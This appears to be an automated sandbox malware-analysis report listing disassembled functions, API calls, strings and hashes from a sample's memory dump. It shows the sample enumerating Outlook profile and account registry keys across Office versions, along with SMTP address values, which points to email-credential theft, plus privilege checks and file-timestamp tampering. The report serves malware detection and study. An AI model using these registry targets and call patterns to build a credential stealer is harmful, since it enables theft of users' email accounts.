Part of subcall function 00434E00: RegEnumKeyExW.ADVAPI32(0043549A,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00435370,00000001), ref: 00434EB6
Part of subcall function 00434E00: RegCloseKey.ADVAPI32(0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434EC3

Part of subcall function 00434ECD: RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00020019,0043549A,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434EF4
Part of subcall function 00434ECD: RegEnumKeyExW.ADVAPI32(0043549A,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00435384,Identities,00000001), ref: 00434F1F
Part of subcall function 00434ECD: lstrlenW.KERNEL32(0043549A,00000000,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434F36
Part of subcall function 00434ECD: lstrlenW.KERNEL32(?,00000000,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434F43
Part of subcall function 00434ECD: lstrcpyW.KERNEL32 ref: 00434F64
Part of subcall function 00434ECD: lstrcatW.KERNEL32(00000000,0047CC6C), ref: 00434F70
Part of subcall function 00434ECD: lstrcatW.KERNEL32(00000000,?), ref: 00434F7E
Part of subcall function 00434ECD: lstrcatW.KERNEL32(00000000,?), ref: 00434F8A
Part of subcall function 00434ECD: RegEnumKeyExW.ADVAPI32(0043549A,?,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00435384,Identities,00000001), ref: 00434FC4
Part of subcall function 00434ECD: RegCloseKey.ADVAPI32(0043549A,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434FD9

Part of subcall function 0043592B: RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00000100,00000100,?,SMTP Email Address,0047C928), ref: 00435973
Part of subcall function 0043592B: RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 00435992
Part of subcall function 0043592B: RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 004359CD
Part of subcall function 0043592B: RegCloseKey.ADVAPI32(00000100), ref: 004359EE

lstrlenW.KERNEL32(00000000,?,?,?,0043549A), ref: 004353A8
lstrcpyW.KERNEL32 ref: 004353C0
lstrcpyW.KERNEL32 ref: 004353CC

Part of subcall function 00434E00: lstrlenW.KERNEL32(0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434E4B
Part of subcall function 00434E00: lstrcpyW.KERNEL32 ref: 00434E68
Part of subcall function 00434E00: lstrcatW.KERNEL32(00000000,0047CC6C), ref: 00434E74
Part of subcall function 00434E00: lstrcatW.KERNEL32(00000000,?), ref: 00434E82

Part of subcall function 00445A55: _free.LIBCMT ref: 00445A68

Strings

Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook, xrefs: 0043545E
Outlook, xrefs: 00435389
Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook, xrefs: 00435472
Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00435364
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook, xrefs: 0043540A
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings, xrefs: 004353FF
Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook, xrefs: 00435434
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 004353ED
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook, xrefs: 00435442
\Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00435370
\Accounts, xrefs: 004353C6
Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook, xrefs: 00435426
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook, xrefs: 00435450
Software\Microsoft\Internet Account Manager, xrefs: 0043538E
Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook, xrefs: 00435418
Identities, xrefs: 0043537A

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$lstrcpylstrlen$CloseEnumOpen$LibraryQueryValue$AddressFreeLoadProc_free
String ID: Identities$Outlook$Software\Microsoft\Internet Account Manager$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook$\Accounts$\Software\Microsoft\Internet Account Manager\Accounts
API String ID: 527226083-92925148
Opcode ID: 4f467f346dbf1ee6fe101150daef03d5d27cf591a87cd6da9a66bbec358481ae
Instruction ID: 0d555bd477462e5ae5348e1b232b1991ce146c984576671113c76f2dd29a40c2
Opcode Fuzzy Hash: 4f467f346dbf1ee6fe101150daef03d5d27cf591a87cd6da9a66bbec358481ae
Instruction Fuzzy Hash: 27310BB1950208BED704EBE6DDD3DEE73ACEF58748F60545FF00521182ABBD2E059629

Uniqueness

Uniqueness Score: -1.00%

Function 004641EE, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMON

Download Yara Rule

APIs

Part of subcall function 00463EA7: CreateFileW.KERNEL32(00000000,00000000,?,00464297,?,?,00000000,?,00464297,00000000,0000000C), ref: 00463EC4

GetLastError.KERNEL32 ref: 00464302
__dosmaperr.LIBCMT ref: 00464309
GetFileType.KERNEL32(00000000), ref: 00464315
GetLastError.KERNEL32 ref: 0046431F
__dosmaperr.LIBCMT ref: 00464328
CloseHandle.KERNEL32(00000000), ref: 00464348
CloseHandle.KERNEL32(0045A93D), ref: 00464495
GetLastError.KERNEL32 ref: 004644C7
__dosmaperr.LIBCMT ref: 004644CE

Strings

H, xrefs: 00464453

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: ae2176c8292bafb7d73a904bbf193ddb6ba473326339fa5daf4097211ca1d489
Instruction ID: 4268d31200a389006fd8fd956af786bf09120caabc753a0eab52de2409f61829
Opcode Fuzzy Hash: ae2176c8292bafb7d73a904bbf193ddb6ba473326339fa5daf4097211ca1d489
Instruction Fuzzy Hash: D5A11632A001549FDF19DF68DC517AE7BE1EF4A324F14015EF811AB392EB398912C75A

Uniqueness

Uniqueness Score: -1.00%

Function 0042032E, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 188filetimeCOMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 004203EC
wsprintfA.USER32 ref: 00420446
wsprintfA.USER32 ref: 00420467
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000010,00000000), ref: 00420496
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00420508
SetFileTime.KERNEL32(?,?,?,?), ref: 00420542
CloseHandle.KERNEL32(?), ref: 00420552

Strings

%s%s%s, xrefs: 00420440
%s%s, xrefs: 00420461
:, xrefs: 00420420

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$wsprintf$CloseCreateHandleTimeWrite_strcat
String ID: %s%s$%s%s%s$:
API String ID: 840165387-3034790606
Opcode ID: f8e25584b0a1a6c02878d25e17f2aaafa4bf28eb325097db5c9ced26a15894f5
Instruction ID: e75abde7eae685be2b2f9ab9f80e574431accfd2092442307ffe520205e795b7
Opcode Fuzzy Hash: f8e25584b0a1a6c02878d25e17f2aaafa4bf28eb325097db5c9ced26a15894f5
Instruction Fuzzy Hash: 08615A30700228AFDB20DF14E880BEA77E9AF04354F50446BE98597293D7789EC6CF18

Uniqueness

Uniqueness Score: -1.00%

Function 00438DFD, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00438E0F
OpenProcessToken.ADVAPI32(00000000), ref: 00438E16
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00438E30
GetLastError.KERNEL32 ref: 00438E3A
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00438E4A
GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00438E5E
ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00438E72
GlobalFree.KERNEL32 ref: 00438E92

Strings

S-1-5-18, xrefs: 00438E7F

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Token$GlobalInformationProcess$AllocConvertCurrentErrorFreeLastOpenString
String ID: S-1-5-18
API String ID: 857934279-4289277601
Opcode ID: 313d5776834a8a810804749beb3a250ab7b62c37ce036a3a53597f76d94bb189
Instruction ID: 29b2e7db3b3389ff21f5b96232cbe853033b43f37d7ff0144f937ce0bd561e70
Opcode Fuzzy Hash: 313d5776834a8a810804749beb3a250ab7b62c37ce036a3a53597f76d94bb189
Instruction Fuzzy Hash: 94112E35E00214BBDB10ABA2DC09F9FBF78EF49755F104069F605E1060EBB89A05DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00434ECD, Relevance: 15.1, APIs: 10, Instructions: 102stringregistryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00020019,0043549A,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434EF4
RegEnumKeyExW.ADVAPI32(0043549A,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00435384,Identities,00000001), ref: 00434F1F
lstrlenW.KERNEL32(0043549A,00000000,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434F36
lstrlenW.KERNEL32(?,00000000,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434F43
lstrcpyW.KERNEL32 ref: 00434F64
lstrcatW.KERNEL32(00000000,0047CC6C), ref: 00434F70
lstrcatW.KERNEL32(00000000,?), ref: 00434F7E
lstrcatW.KERNEL32(00000000,?), ref: 00434F8A
RegEnumKeyExW.ADVAPI32(0043549A,?,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00435384,Identities,00000001), ref: 00434FC4
RegCloseKey.ADVAPI32(0043549A,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434FD9

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$Enumlstrlen$CloseOpenlstrcpy
String ID:
API String ID: 3646165539-0
Opcode ID: f3da31941f67786af58abdc84a3d63bc59a35e599f2a3f33a84cac361793eba7
Instruction ID: 84fe12fb3e25c27bb54342457b29e1adbaab05e93512211763e3781aba143f04
Opcode Fuzzy Hash: f3da31941f67786af58abdc84a3d63bc59a35e599f2a3f33a84cac361793eba7
Instruction Fuzzy Hash: B2314171E00109BBDB109B91DC88EEF7BBCEF89744F14406AF405E2210EBB8AE45DA65

Uniqueness

Uniqueness Score: -1.00%

Function 0045984D, Relevance: 13.8, APIs: 9, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7e990d26b69cb125c033e30afbfbdd4df334c671032496715940f34d873b0a0
Instruction ID: 07b9d936a766d6b50e7dfe1019eefbb7ff4beb11db5ae68d8d4c2ca7d7772d3b
Opcode Fuzzy Hash: c7e990d26b69cb125c033e30afbfbdd4df334c671032496715940f34d873b0a0
Instruction Fuzzy Hash: ACC1DDB0A04245EFEB11CF99D880BAEBBB1FF49305F04405AE9409B393D739AD45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00416EAD, Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 322COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00416EB2

Part of subcall function 0040AF03: __EH_prolog.LIBCMT ref: 0040AF08

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

Strings

7>/(, xrefs: 004170DD
]s9<), xrefs: 0041722A
i`qv, xrefs: 0041723D
E@U, xrefs: 0041717D
.*-$, xrefs: 00417139
Y, xrefs: 00417244

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Deallocate
String ID: .*-$$7>/($E@U$Y$]s9<)$i`qv
API String ID: 2428181759-1285848389
Opcode ID: c13839002752df23235169cf64fcd217dfc5a4ed05fe3872f548b6d220feb588
Instruction ID: 5c09770262b4dee08a45ab733f9034201edc935d23fd1d9822186e371322f0ec
Opcode Fuzzy Hash: c13839002752df23235169cf64fcd217dfc5a4ed05fe3872f548b6d220feb588
Instruction Fuzzy Hash: BCD1F330D04259CACF15DFA5D991AEDBBB1AF19304F2041AFE40A77282DB385B89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00457E01, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 177fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00457596: GetConsoleCP.KERNEL32(00000005,~eD,00000000), ref: 004575DE

WriteFile.KERNEL32(?,00000000,?,00445098,00000000,00421A56,~eD,~eD,00000010,00445098,00000000,00000005,00421A56,00421A56,?), ref: 00457F52
GetLastError.KERNEL32(?,0044657E), ref: 00457F5C
__dosmaperr.LIBCMT ref: 00457FA1

Strings

~eD, xrefs: 00457E15, 00457E16
~eD, xrefs: 00457E17, 00457E84, 00457E93, 00457ED3, 00457F0F, 00457F1F, 00457F2F
~eD, xrefs: 00457EDF, 00457F6E

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ConsoleErrorFileLastWrite__dosmaperr
String ID: ~eD$~eD$~eD
API String ID: 251514795-1598461380
Opcode ID: 27ad540d65e50a43cb431455240b37a87264fc6fb909ff777adbe444ef2102e1
Instruction ID: c093bf76889acc17d1fa22036b65b016a06f1330f7e599f4f56079382a32407d
Opcode Fuzzy Hash: 27ad540d65e50a43cb431455240b37a87264fc6fb909ff777adbe444ef2102e1
Instruction Fuzzy Hash: C551D872908209AFEB11DBA4E841BEFB7B9EF05359F140467E900A7253D738DD09C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00438AD4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 120registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00438AD9
RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,755524D0,00000000,00000008), ref: 00438B5B
RegQueryValueExA.KERNEL32(?,?,00000000,?,?,00000040), ref: 00438BA8
RegCloseKey.ADVAPI32(?), ref: 00438BC9

Strings

$iEGLMJAcQM@, xrefs: 00438B89
@, xrefs: 00438B16

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseH_prologOpenQueryValue
String ID: $iEGLMJAcQM@$@
API String ID: 1233982722-1058998065
Opcode ID: 77bde8bc783017021f3b4e8342692c347dc3ffaae985dcc62c5c04670026a521
Instruction ID: 367bd93084d2a7a35925e445f485166969b1686228f1c74074b6aa4ed539c815
Opcode Fuzzy Hash: 77bde8bc783017021f3b4e8342692c347dc3ffaae985dcc62c5c04670026a521
Instruction Fuzzy Hash: 985178B0D002599ECB21CFA8D980AEEFBF9BF18304F14516EE449B7202DB745A89CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00434E00, Relevance: 10.6, APIs: 7, Instructions: 75stringregistryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00020019,0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434E25
lstrlenW.KERNEL32(0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434E4B
lstrcpyW.KERNEL32 ref: 00434E68
lstrcatW.KERNEL32(00000000,0047CC6C), ref: 00434E74
lstrcatW.KERNEL32(00000000,?), ref: 00434E82
RegEnumKeyExW.ADVAPI32(0043549A,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00435370,00000001), ref: 00434EB6
RegCloseKey.ADVAPI32(0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434EC3

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$CloseEnumOpenlstrcpylstrlen
String ID:
API String ID: 2943937744-0
Opcode ID: 0219d67e338bd40beddbb7ed987e369c0af50fc4acf4526ffcb48d48a81d74d0
Instruction ID: 3f527511bd662a90bea5e564ca16ff505b986783f0fc1497e79a41689b46f2dc
Opcode Fuzzy Hash: 0219d67e338bd40beddbb7ed987e369c0af50fc4acf4526ffcb48d48a81d74d0
Instruction Fuzzy Hash: 1D216375901118BFEB119F91DD49DEF7B7CEF09355F004066F905E1110EBB85E41CAA9

Uniqueness

Uniqueness Score: -1.00%

Function 0043592B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00000100,00000100,?,SMTP Email Address,0047C928), ref: 00435973
RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 00435992
RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 004359CD
RegCloseKey.ADVAPI32(00000100), ref: 004359EE

Part of subcall function 00445A55: _free.LIBCMT ref: 00445A68

Strings

SMTP Email Address, xrefs: 00435932

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: QueryValue$CloseOpen_free
String ID: SMTP Email Address
API String ID: 3744367872-3214364705
Opcode ID: b2897442432286f6c7a9022d3ac1aee0ff1fca355918e22b49cf5c7a22221acd
Instruction ID: bea77520f8f9eb75bb65e4d96276d8d86ba46bdd8d66cb8aacbcea5d3b3ef5e9
Opcode Fuzzy Hash: b2897442432286f6c7a9022d3ac1aee0ff1fca355918e22b49cf5c7a22221acd
Instruction Fuzzy Hash: 53319FB1A00609FBEF20DF51DC81FAB7769EF48764F105026FD04AA240E339DD018B69

Uniqueness

Uniqueness Score: -1.00%

Function 00439060, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70processCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00439095
CreateProcessA.KERNEL32 ref: 0043911E
CloseHandle.KERNEL32(?), ref: 00439127
CloseHandle.KERNEL32(?), ref: 00439130

Strings

N, xrefs: 004390CC

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle$CreateFileModuleNameProcess
String ID: N
API String ID: 2820832629-1130791706
Opcode ID: 537e7a186abd502eaad7ebf34fdc1c2b917a28003db7b6770d01e220b166d494
Instruction ID: 68ee94fd2c3d38f532c313cd76568c7e192aa3a233b4418db67ca55748b57ded
Opcode Fuzzy Hash: 537e7a186abd502eaad7ebf34fdc1c2b917a28003db7b6770d01e220b166d494
Instruction Fuzzy Hash: 24218771D1024CBFEB019BA8DC85EEEB77CFF58304F005166F609A2021E6B15A89CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040BB39, Relevance: 7.8, APIs: 5, Instructions: 295memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040BB3E
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 0040BC51
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 0040BC58
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 0040BE1C
HeapFree.KERNEL32(00000000), ref: 0040BE23

Part of subcall function 0040AF03: __EH_prolog.LIBCMT ref: 0040AF08

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$FreeH_prologProcess$Deallocate
String ID:
API String ID: 4229974167-0
Opcode ID: 1bf17632794a13764e053c55acb2c3fd1f71e664dad22f9c68765ba8e0c6db01
Instruction ID: ff5ab6fc8fa2ec8c53a5ec707b9340397546a5a578c2f07b21ef2291de541eaa
Opcode Fuzzy Hash: 1bf17632794a13764e053c55acb2c3fd1f71e664dad22f9c68765ba8e0c6db01
Instruction Fuzzy Hash: DBC14A71C00248DBCF15DFE5D990ADDFBB5AF18304F60806EE815B7291DB786A48CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0042026B, Relevance: 7.6, APIs: 5, Instructions: 73COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,?), ref: 0042027F
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0042028D
_strcat.LIBCMT ref: 004202F3
GetFileAttributesA.KERNEL32(00000000,00000000,?), ref: 00420310
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00420324

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesCreateDirectoryFile$_strcat
String ID:
API String ID: 2481838186-0
Opcode ID: 5386050ffdcb0e579c67ccba1131c0ef88f796de169c57935e7edbd14464b3f9
Instruction ID: 926b765d940c7e4cf03c66ed4fade1eb7be7ee2715b4740a0b314bdbf1d4a8a6
Opcode Fuzzy Hash: 5386050ffdcb0e579c67ccba1131c0ef88f796de169c57935e7edbd14464b3f9
Instruction Fuzzy Hash: B7116A71F0032457CB204668BC8CBDB77AC9F56314F9401E7E59593292DAB84D85467C

Uniqueness

Uniqueness Score: -1.00%

Function 0043EAC9, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(?,00000000,00000001,00488780,00000000,?,00420971), ref: 0043EB19
CloseHandle.KERNEL32(?,00000000,00000001,00488780,00000000,?,00420971), ref: 0043EB30
CloseHandle.KERNEL32(00000000,00000000,00000001,00488780,00000000,?,00420971), ref: 0043EB45

Strings

qB, xrefs: 0043EB47

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle$FileUnmapView
String ID: qB
API String ID: 260491571-3814867072
Opcode ID: 9712e018d1e961cf73ccf0d32716732a4b896ee084bc0a68f4d03d3075c4d1c5
Instruction ID: e977a0ad52390a9479858dad65047066fdb2ac9878eb5a18df951fdaec7b8c6f
Opcode Fuzzy Hash: 9712e018d1e961cf73ccf0d32716732a4b896ee084bc0a68f4d03d3075c4d1c5
Instruction Fuzzy Hash: 27218E709017009FDB22EB2AC885B5BF7E0BF09314F14846FE19A52691D7B8B840CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00409478, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040947D

Part of subcall function 0043F433: FormatMessageA.KERNEL32(00001300,00000000,?,00000000,?,00000000,00000000), ref: 0043F449

LocalFree.KERNEL32(0000000F,unknown error,0000000D), ref: 004094C3
LocalFree.KERNEL32(?), ref: 004094DC

Strings

unknown error, xrefs: 004094A8

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLocal$FormatH_prologMessage
String ID: unknown error
API String ID: 252809769-3078798498
Opcode ID: f51b3c05fe10017a4e2fa1ee7939c4c13eae3f80d6a52d5bcae3c16fbdef1537
Instruction ID: 143033a275fd9ea4cf15bf30338bea89ac0712dc1e52f0ce6ff51ee7e44748fa
Opcode Fuzzy Hash: f51b3c05fe10017a4e2fa1ee7939c4c13eae3f80d6a52d5bcae3c16fbdef1537
Instruction Fuzzy Hash: F1014471900205AFDB11EFA5C941AAEBBB5FF18304F10843FB449B7252D7789E04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0043EDE9, Relevance: 6.1, APIs: 4, Instructions: 114fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0043EC21: CopyFileW.KERNEL32(?,?,00000000,?,?,?,0043EF0B,?,0040B6A1,00000000,?,?,?,?,0040B6A1,?), ref: 0043EC31

CreateFileW.KERNEL32(?,00000081,00000000,00000000,00000003,00000000,00000000,?,0040B6A1,00000001,?,?,?,?,0040B6A1,?), ref: 0043EE31
GetLastError.KERNEL32(?,?,0040B6A1,?,?,?,?,?,?,00000000,?), ref: 0043EE3E

Part of subcall function 0043EC56: CloseHandle.KERNEL32(000000FF,?,0043F31E,?,?,?,00000080,?), ref: 0043EC62

CreateFileW.KERNEL32(0040B6A1,00000082,00000000,00000000,00000003,00000000,00000000,?,?,0040B6A1,?,?), ref: 0043EE6F
GetLastError.KERNEL32(?,?,0040B6A1,?,?,?,?,?,?,00000000,?), ref: 0043EE7C

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CreateErrorLast$CloseCopyHandle
String ID:
API String ID: 1748377786-0
Opcode ID: 0523ac7acdf49ba59a6fa57aa7c90fcb5d701ac867f32195bcedb89e461acc75
Instruction ID: f3148ced24aea4c6fe529a70361ff3d9a58b080bd54d29d9bdfa659a1503fe1e
Opcode Fuzzy Hash: 0523ac7acdf49ba59a6fa57aa7c90fcb5d701ac867f32195bcedb89e461acc75
Instruction Fuzzy Hash: 8331A671A02119BFDB21ABB78C829BF76ACAF0C714F042526F910D62C2D7B8DD019669

Uniqueness

Uniqueness Score: -1.00%

Function 0040B7F6, Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00488780,00488780,00000000,?,?,004207F8,00000000,?,00000000), ref: 0040B80A
CreateDirectoryTransactedA.KERNEL32 ref: 0040B823
CommitTransaction.KTMW32(00000000,?,004207F8,00000000,?,00000000,00000000), ref: 0040B82E
RollbackTransaction.KTMW32(00000000,?,004207F8,00000000,?,00000000,00000000), ref: 0040B836

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Transaction$Create$CommitDirectoryRollbackTransacted
String ID:
API String ID: 629542334-0
Opcode ID: 50e14b63ca18d633df6a308b7ec4a38018a85421cc885a30688cbf6e21692c77
Instruction ID: b18be14526ba35e09e9024abd98d8d90bc636f0dd60b729d8671da52b2d2403f
Opcode Fuzzy Hash: 50e14b63ca18d633df6a308b7ec4a38018a85421cc885a30688cbf6e21692c77
Instruction Fuzzy Hash: 53F0B472A00115BFE71027999CCCD677A2CEB457B47144636FA22A22E0F7B09C4186FE

Uniqueness

Uniqueness Score: -1.00%

Function 0042BFF5, Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000), ref: 0042C008
RemoveDirectoryTransactedA.KERNEL32 ref: 0042C01F
CommitTransaction.KTMW32(00000000,?,00000000), ref: 0042C02A
RollbackTransaction.KTMW32(00000000,?,00000000), ref: 0042C032

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Transaction$CommitCreateDirectoryRemoveRollbackTransacted
String ID:
API String ID: 1201024725-0
Opcode ID: 52e9d3ae115f385b2bf6edc5f6143662b3c9fc35e394ef1331fad7615f1dd12f
Instruction ID: 183120d38f6de6230f0cb0750d318de0fef5fbbbb85c50116f72fc63eed6bb1a
Opcode Fuzzy Hash: 52e9d3ae115f385b2bf6edc5f6143662b3c9fc35e394ef1331fad7615f1dd12f
Instruction Fuzzy Hash: 21F0E272B00120FFE7200BA9AC4CD7B766CDB46770B10062AFC22D72D0E6B49D4186BA

Uniqueness

Uniqueness Score: -1.00%

Function 0040B7A7, Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00488780,00000000,00000000,?,004209C9,00000000), ref: 0040B7BA
DeleteFileTransactedA.KERNEL32 ref: 0040B7D1
CommitTransaction.KTMW32(00000000,?,004209C9,00000000), ref: 0040B7DC
RollbackTransaction.KTMW32(00000000,?,004209C9,00000000), ref: 0040B7E4

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Transaction$CommitCreateDeleteFileRollbackTransacted
String ID:
